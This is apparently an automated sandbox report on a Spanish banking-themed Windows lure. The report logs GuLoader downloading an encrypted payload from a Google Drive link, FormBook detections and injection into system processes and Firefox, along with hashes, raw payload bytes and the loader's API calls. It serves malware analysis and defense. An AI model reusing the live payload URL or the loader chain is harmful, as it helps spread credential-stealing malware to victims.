2024-02-28 14:43:34 UTC	1582	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 28 Feb 2024 14:43:34 GMT Location: https://drive.usercontent.google.com/download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-vHR0oLzuk-BaQ3_9Y8MeXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	50225	142.250.188.225	443	5520	C:\Users\user\Desktop\cuenta iban-ES65.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-28 14:43:35 UTC	258	OUT	GET /download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-02-28 14:43:36 UTC	4686	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPoEx9APm9IDire89dp9b5Hvip9ftNv6MX5Mktg0E-9_9s3kXrKYW48TzBvotTh9Hbciy6dgKb4wnA Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="WFuVc221.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 273984 Last-Modified: Wed, 28 Feb 2024 11:12:44 GMT Date: Wed, 28 Feb 2024 14:43:35 GMT Expires: Wed, 28 Feb 2024 14:43:35 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=6Pz/QQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-28 14:43:36 UTC	4686	IN	Data Raw: a4 a9 78 38 c6 8c 6f 1f 35 e6 64 bf 80 c1 68 7e 10 96 fd a5 6d 07 bf 3f ef 73 35 4c 97 d6 50 58 b1 33 dc dd a4 0a 8d 97 77 93 a2 46 a1 05 ee ee e1 74 a8 47 7f 9c 5c e6 3d df ce 1e 9c f9 ba ef aa 03 71 2b 6d 0b ca 3c f0 d0 81 62 71 23 1e e3 94 f7 8c 31 8a 10 87 69 73 3f fb b6 ea ea 9e 54 c3 46 f3 9d cf 91 e4 65 47 62 b5 98 b3 32 9a 18 0e d6 bf ac 23 d0 32 54 8f b1 92 ff 9a cb 1d e2 39 0d 62 12 4f 9d f9 02 05 6a 65 58 29 b8 26 56 58 68 bf 54 10 42 eb 53 ce 3c 83 af 69 2e ae 84 94 86 b4 8d f2 8c a4 76 c7 2e ca 50 c7 22 86 c3 c6 f9 44 3e c8 6f 8e 84 24 0a db 43 6d c7 1e b1 91 0e 20 40 87 27 63 13 d2 39 51 54 57 e6 da d9 9c 2e 93 09 70 67 04 33 59 87 48 4e 5d c1 85 66 4b 66 f1 0f 61 26 a7 2d ad 55 03 2a c3 5c be a2 4f e7 88 1f ef 6c fe 70 c6 02 bf 06 18 31 f7 Data Ascii: x8o5dh~m?s5LPX3wFtG\=q+m<bq#1is?TFeGb2#2T9bOjeX)&VXhTBS<i.v.P"D>o$Cm @'c9QTW.pg3YHN]fKfa&-U*\Olp1
2024-02-28 14:43:36 UTC	4686	IN	Data Raw: be cb c5 e6 a8 a9 f1 31 4e 7f bb 1f 60 e5 f2 24 f1 f9 19 1b 38 6e 4d b6 ce 3a 01 ac 66 32 71 e7 61 0e 14 a2 65 20 6e eb be 5f 2c 18 db 07 ea 41 d2 27 f3 de d5 3d 8c 0e 08 c6 c5 f1 e8 21 4b 81 d0 e4 bb 87 3b e7 46 f3 7a 4a 95 ec 3c 6b 3b 4b d1 12 bc 9f 51 c7 74 8d 9d 59 91 93 6a 49 d6 d3 43 98 6e 80 c3 6d 7c 3b ac 94 60 da 18 50 de 52 16 e7 be 46 6b 92 1f ed 95 ef 2c 0d cd da d2 61 e1 84 d1 d0 88 88 b6 46 93 e0 43 e9 d1 01 9f a0 cc ae 11 0a 26 a8 3a 99 67 b7 a0 88 f5 52 d6 62 23 a5 44 f7 5d b8 8c f9 f4 9e d4 00 b5 e6 19 bb 86 11 68 01 40 e3 46 04 52 35 3d 65 44 b9 84 8b ba 0a b7 f8 d1 fc 41 6d dc 14 63 22 6f af f4 ad ec 31 60 22 52 e7 c5 6a 1a 05 b6 1b bc e8 cf d5 e2 d9 87 87 50 b3 cc 42 f9 21 46 fc da 29 38 d2 1f 33 5b d5 d6 99 2f 4f a3 81 5b 48 73 25 cb Data Ascii: 1N`$8nM:f2qae n_,A'=!K;FzJ<k;KQtYjICnm\|;`PRFk,aFC&:gRb#D]h@FR5=eDAmc"o1`"RjPB!F)83[/O[Hs%
2024-02-28 14:43:36 UTC	1964	IN	Data Raw: 3a 5c 8f ca 5e 59 b0 c8 2c 47 29 8b 57 1c c4 ae df c5 ee b3 b6 9b 49 0b 32 be 7b 5d a5 7e 00 44 51 fc 2a 43 4d f5 f9 d3 9b aa 6f 9a 54 2c d6 e5 b2 64 7c d7 51 9e 16 6e 36 89 ee 60 16 d2 82 35 7c b2 81 76 06 21 6c ba ab 84 bc c0 c4 d2 90 62 6d 95 92 71 80 4b 31 2e c9 1d 57 6a 6b 12 7c b7 5b b4 08 f2 8a 87 64 6d 76 17 9e 5b 95 b1 42 5a e1 a4 0c d4 fc f3 7c f0 b3 ed e1 f1 18 f0 1b f4 96 b9 a8 04 41 e7 bc 05 89 8e c7 c9 64 f7 71 d2 71 a4 c5 5b e7 22 98 e5 fa 31 e7 03 a6 db 8f eb 3f 2e fd 2b eb 3f bc cc b5 fb 59 ef 8f 34 1d 34 0b 27 82 4f 2d 80 3a 80 3d 19 cf b2 53 f3 2e e2 4a 05 52 67 4e 47 5c 3a 87 02 b5 b2 0d e1 61 98 6e 98 8c a0 5c d8 07 d2 e3 4f d0 b2 52 5f d3 b8 26 1f c2 b9 8e c5 c1 ca b6 4a 12 bb a5 42 d3 e1 e7 44 33 f6 0a 06 19 58 cd 0f c4 3e a9 41 d2 Data Ascii: :\^Y,G)WI2{]~DQ*CMoT,d\|Qn6`5\|v!lbmqK1.Wjk\|[dmv[BZ\|Adqq["1?.+?Y44'O-:=S.JRgNG\:an\OR_&JBD3X>A
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: 9a d9 82 41 5e d4 ff 21 a3 81 66 ab dd 17 35 25 43 71 f4 56 23 5c f0 f8 bd fa ae e0 75 31 c8 01 6f 66 ed 11 a6 bd 7a fb ee 8d 6e 64 e2 34 19 22 1a 9c 81 4a 06 fb 72 f1 7d 0b 52 ef 20 3f 3e bb 7a b8 b6 2b 0a 11 6f 07 41 d8 9f e4 5e e4 64 81 ff f0 d4 b0 4c 4d ce 95 0d 7f cc 68 4f 34 f0 26 d7 9b 96 c9 ff e8 b7 6a f6 1b 66 8b a0 d0 6c d5 22 80 84 b6 af ca fe a3 a0 54 19 2f a5 e7 04 d8 8f 58 8b 11 4c 06 31 66 ca 0e 9b 34 0d 77 be bf 59 7e 91 30 f0 0e a3 44 7b fa 06 0b c1 e8 ea 15 8c 0f c0 1b 8f bb 51 60 4d 1c 71 a1 64 b4 4b 31 50 01 0f d7 19 68 8f 3d 1a 59 24 b4 b3 3e 56 01 2f 5c 3b 0c 42 d6 d3 9c 11 da e6 ed 5c 80 9e 60 d8 06 d2 08 02 28 13 eb de 3f 18 86 32 7c 56 35 17 9c 92 3c 36 01 79 9b 9c 2a 1c 19 65 4d f6 28 05 d3 93 2d e5 f5 32 fa c9 10 5f 74 93 ed 79 Data Ascii: A^!f5%CqV#\u1ofznd4"Jr}R ?>z+oA^dLMhO4&jfl"T/XL1f4wY~0D{Q`MqdK1Ph=Y$>V/\;B\`(?2\|V5<6y*eM(-2_ty
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: cf a2 05 79 51 a0 48 96 7b b3 62 b3 74 a2 07 34 b4 d7 71 88 cd 26 22 84 8b f1 42 76 9b de 04 6c 24 a1 1b 44 4e bb 90 af bb 9c 17 f8 0e 50 9c 14 64 eb 0d e5 24 1a 2b 01 3c 50 0e df 52 b2 a7 37 92 d2 75 34 24 88 9b 84 66 f3 13 06 bc 71 b1 1a 10 6c a8 ed 96 62 93 bd bc 4f c5 5a 7a 66 6b f5 ad 31 5c e8 73 b1 bf e0 3c 37 4e 9c 6a 38 42 1d 8c 40 fc 2f 13 35 fd 5f 3d 9a 89 33 6c 48 42 65 cb 83 56 fb 88 6f e1 64 1f ef d3 d6 37 9e 2c 6c e4 cb 47 da 3a cb 01 61 70 d5 2a 8a d1 5d 5d 5c 0f 07 27 6d 11 0e 03 6b c4 99 c1 63 68 52 86 2e 10 5f d4 68 82 42 70 81 e9 e2 cd 09 e0 ab 4c 65 b3 62 15 4b a4 d4 cb b5 45 e7 34 fe 1f 9c be 54 d7 e5 c7 8c 82 d3 35 dd 00 64 c7 79 28 b7 64 5a b6 08 aa 9c 83 0c 90 c9 6c a2 81 fd 19 e6 47 5e 88 78 a3 11 95 a2 1e 6f 0b 90 8c 22 7b b1 ae Data Ascii: yQH{bt4q&"Bvl$DNPd$+<PR7u4$fqlbOZzfk1\s<7Nj8B@/5_=3lHBeVod7,lG:ap*]]\'mkchR._hBpLebKE4T5dy(dZlG^xo"{
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: a2 5b 15 4d 6c 08 20 58 5b 7b 4b d2 63 6a a3 9a 59 fe 6f b8 3e 1c f5 ab 7e d6 ab bf 3a d5 51 dc 44 87 44 6c 53 f9 48 72 08 fc 22 b3 ed 7a 7f 1d 99 40 98 c0 c8 50 42 59 56 c8 a3 6c 92 6b f4 6d 08 06 9c a9 20 6b 48 2d 54 57 d2 85 71 b8 8d c4 a1 ab 52 82 32 3a 20 53 8a 74 5d 32 6f e7 3a 3f ff 9e db 6c 91 35 54 52 ee 86 e9 fa 25 78 4e 76 6d 9b a4 6d b3 a2 7f d1 1c b1 68 13 e5 06 a2 a8 32 ef 60 43 40 96 dd c4 cf fd fa cb 5d 62 86 5c 6c 87 fa 5d 8c 24 d2 79 bc 13 ff 68 a5 0d c2 fe c7 e7 71 4b 97 a8 cd ce b3 5f 4b 9f 17 17 ed 95 36 a1 47 13 3c 98 cc 8a 79 29 8f dd d1 1e fe a6 f4 f4 8c dc 6f 1b bf 87 29 10 06 96 cf 84 22 13 66 e8 c5 0b 22 53 cf 3a 1e 4c c9 2a 75 a4 2c c8 2b f9 c0 2e 40 95 a4 0c a4 20 c5 6e ac 5c ae 92 22 66 7e 8a 8e e0 dd d0 02 e8 5a c7 a1 ff 91 Data Ascii: [Ml X[{KcjYo>~:QDDlSHr"z@PBYVlkm kH-TWqR2: St]2o:?l5TR%xNvmmh2`C@]b\l]$yhqK_K6G<y)o)"f"S:L*u,+.@ n\"f~Z
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: a5 a7 8f b6 45 37 91 cb ea 8c 94 d6 ca 14 3e 30 31 9e 0b f6 73 75 03 18 ea d6 ab ea fa 82 d1 44 69 27 ea a7 be 2a 53 ea 8f 33 c2 ec 65 1b 98 ec 2d 5d 8b 37 e8 61 ec f7 51 2d 4c 09 a9 05 8e ca 42 c6 e3 d3 b4 f2 73 eb 5c ff 33 93 e7 c0 6e ba 9f 17 83 53 13 88 32 db d8 04 97 bc ed 16 9f 10 e7 d5 a7 0d 9b bf 08 4c 27 4a 6b 03 d6 0d d4 79 a3 f7 f7 9e 43 6e e8 56 68 ff 38 9a 4b 84 c6 cd fb 5a fd 6e cf 1a c6 ea 37 75 d9 4e b4 36 3a 7d 7b 11 2c 5e 5a 46 33 9a 25 cc 38 ae e5 cd 93 d2 2b 62 32 82 ee 42 a0 f0 80 e9 59 ca f6 96 aa 29 06 4b e3 81 57 88 e6 44 f8 66 c8 40 12 b0 5c b2 e5 f4 d0 e7 44 f3 54 39 f0 72 b8 90 f0 0e c6 1c a4 d2 db 19 75 11 44 d8 9a e5 3d 3e f7 2c 4a 50 29 88 5c ff 89 2c f9 b4 0d f4 f3 65 24 8d 76 14 e3 4d ee 0f c1 92 02 99 67 cb 59 47 36 10 75 Data Ascii: E7>01suDi'*S3e-]7aQ-LBs\3nS2L'JkyCnVh8KZn7uN6:}{,^ZF3%8+b2BY)KWDf@\DT9ruD=>,JP)\,e$vMgYG6u
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: 02 ab 40 10 3c 52 9b 46 e5 3f dd e3 ce 66 ec af 2c 9a af 9d 1f 7e 70 ae 8f ce 0b 65 ed c4 5a 1f 2d 2f e6 4a b4 07 2e b7 27 8d 9c 7a 61 1f 7b f8 9b 74 e2 9c ca 7f ff 13 de 34 37 f9 ac 63 49 a1 2f e5 69 25 4f c2 b6 3f 53 ff cf ac 86 1f 90 10 c9 3d ad 03 0f 3a 23 d8 9c f5 a5 f4 72 c4 aa fd 29 84 65 4c c0 db 7d 62 f2 ad 5b be b3 e3 4a 9c 3c 0d f8 e9 dd 86 da d1 4d 11 42 e3 a3 b3 c0 03 32 b8 c5 bb 5f 2d cf b5 99 39 68 09 12 73 2c e2 22 55 fa 45 33 4d 8a fd 60 b5 4e 34 44 a0 b5 85 10 55 be 18 48 10 2e f2 3c 56 1e 78 31 bb b1 69 49 df 3a 5f cc c9 dc 84 2c ba 8a 58 c4 91 b5 ef e3 0c d2 e3 ee cc c3 4e 92 92 f1 27 7b 77 15 40 98 39 06 dd fa eb 20 a0 5a ad b4 17 d9 07 ae 29 5b bf 08 e0 ac aa a6 ac 8c ec 43 30 5e 8b 85 dc 02 98 fc 58 a1 8e 55 7a 2e 1c 6b 1b 72 36 8d Data Ascii: @<RF?f,~peZ-/J.'za{t47cI/i%O?S=:#r)eL}b[J<MB2_-9hs,"UE3M`N4DUH.<Vx1iI:_,XN'{w@9 Z)[C0^XUz.kr6
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: 77 80 b0 bb 66 b5 2f 14 4b 47 a6 22 2f b8 94 42 be 5e 9a e6 d9 2e e3 04 89 aa 59 04 2a c5 e9 e1 5f e9 4c cb 1b d9 5d 87 00 a7 74 52 73 99 04 90 de 23 17 7e 00 e8 f4 a6 6c df 8c aa 83 d4 99 d2 51 6e 77 06 d3 ee e2 9a bc 31 c3 6f 5a bf 8a 02 f6 42 d0 e6 db 63 51 76 ab c3 55 d9 dc 3f 15 6d 4f 45 13 e4 6d fc 19 92 1c aa a8 88 4c 12 7a 16 4e d4 cc 86 f9 22 fb 42 da c3 24 4c 07 e2 41 c5 89 e3 c7 1e 13 d8 78 2f 26 ab 5e c0 95 51 0f a1 24 16 e2 2c 51 2f 13 6c 88 47 ca fe d0 6c 60 19 e1 a7 6b d4 f3 a9 3c 80 0a c3 7b 6e 1f c2 02 f4 55 00 00 31 ab ec 28 c3 31 4e 41 e8 fe 65 37 2e 6f 78 8f 4e 01 07 0e d0 d5 92 57 bd 8e a1 57 e2 9c 89 1f 9c 69 3f 52 7c 06 01 ff 35 d1 76 cc 6a 60 75 85 8f 54 06 fe 8d 19 84 87 ac 79 24 a6 ad 22 66 28 ea 29 bc b1 d5 84 47 6c 39 6f 59 b0 Data Ascii: wf/KG"/B^.Y*_L]tRs#~lQnw1oZBcQvU?mOEmLzN"B$LAx/&^Q$,Q/lGl`k<{nU1(1NAe7.oxNWWi?R\|5vj`uTy$"f()Gl9oY
2024-02-28 14:43:36 UTC	1252	IN	Data Raw: 31 41 88 f4 6d 7e f5 c4 b8 58 6a 9e a1 f4 48 b7 bd 09 64 2a f0 21 88 5b 8c 5c 66 7f f4 73 87 f2 91 28 b2 d1 00 47 cd 9d 07 76 7d fb 40 bf 32 50 e6 74 91 ea c6 91 30 15 f7 7f 67 28 f4 6c fd 72 04 9c a9 6e 75 4d ea ea 7d 6b 41 d3 2f 76 03 70 53 ec 17 6e 80 bf 09 16 f9 d7 05 76 e1 ea 90 8f a5 c3 bc 02 d6 64 df 85 3f b8 06 89 7f 12 1c 58 78 c2 2a bb 35 0e 6a d8 f3 04 c1 5f e1 3b 70 ed ad 58 97 00 1c c2 c1 08 04 22 4a 2d 05 4a fa 80 cd 10 0e c6 e6 89 a2 57 37 97 10 41 65 7b ba e9 76 5b 62 86 2a 56 6d e4 e9 a7 77 3a 77 85 ad b0 01 10 bf 26 c1 1e d8 9e 5b af 7f 42 de 39 d5 c6 0b 14 58 a7 bc fe 4b c4 9d d8 f4 3f bd 0f 35 5f 4b 32 46 f9 00 b8 cc ea fd b4 27 18 bc a1 03 fc 78 a9 b3 15 9e 81 98 f0 17 77 1e ad bb 7b 31 da 91 91 a0 07 bf 13 80 75 24 56 7c f0 98 cc cc Data Ascii: 1Am~XjHd![\fs(Gv}@2Pt0g(lrnuM}kA/vpSnvd?Xx5j_;pX"J-JW7Ae{v[b*Vmw:w&[B9XK?5_K2F'xw{1u$V\|

Target ID:	0
Start time:	15:42:38
Start date:	28/02/2024
Path:	C:\Users\user\Desktop\cuenta iban-ES65.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\cuenta iban-ES65.exe
Imagebase:	0x400000
File size:	906'344 bytes
MD5 hash:	5879A124CD6D7BFBF0133E005F1BDEBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.13148143396.0000000007C51000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:43:20
Start date:	28/02/2024
Path:	C:\Users\user\Desktop\cuenta iban-ES65.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\cuenta iban-ES65.exe
Imagebase:	0x400000
File size:	906'344 bytes
MD5 hash:	5879A124CD6D7BFBF0133E005F1BDEBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:43:39
Start date:	28/02/2024
Path:	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe"
Imagebase:	0x960000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:43:41
Start date:	28/02/2024
Path:	C:\Windows\SysWOW64\rasautou.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rasautou.exe
Imagebase:	0xe20000
File size:	15'360 bytes
MD5 hash:	DFDBEDC2ED47CBABC13CCC64E97868F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:43:53
Start date:	28/02/2024
Path:	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe"
Imagebase:	0x960000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	15:45:00
Start date:	28/02/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x7ff673300000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	15.6%
Signature Coverage:	18.8%
Total number of Nodes:	1353
Total number of Limit Nodes:	41

Executed Functions

Function 004030EC Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403111
GetVersion.KERNEL32 ref: 00403117
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
#17.COMCTL32(00000007,00000009), ref: 00403162
OleInitialize.OLE32(00000000), ref: 00403169
SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
GetCommandLineA.KERNEL32(Centrifugers Setup,NSIS Error), ref: 0040319A
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\cuenta iban-ES65.exe",00000000), ref: 004031AD
CharNextA.USER32(00000000,"C:\Users\user\Desktop\cuenta iban-ES65.exe",00000020), ref: 004031D8
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032E6
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F2
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403306
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330E
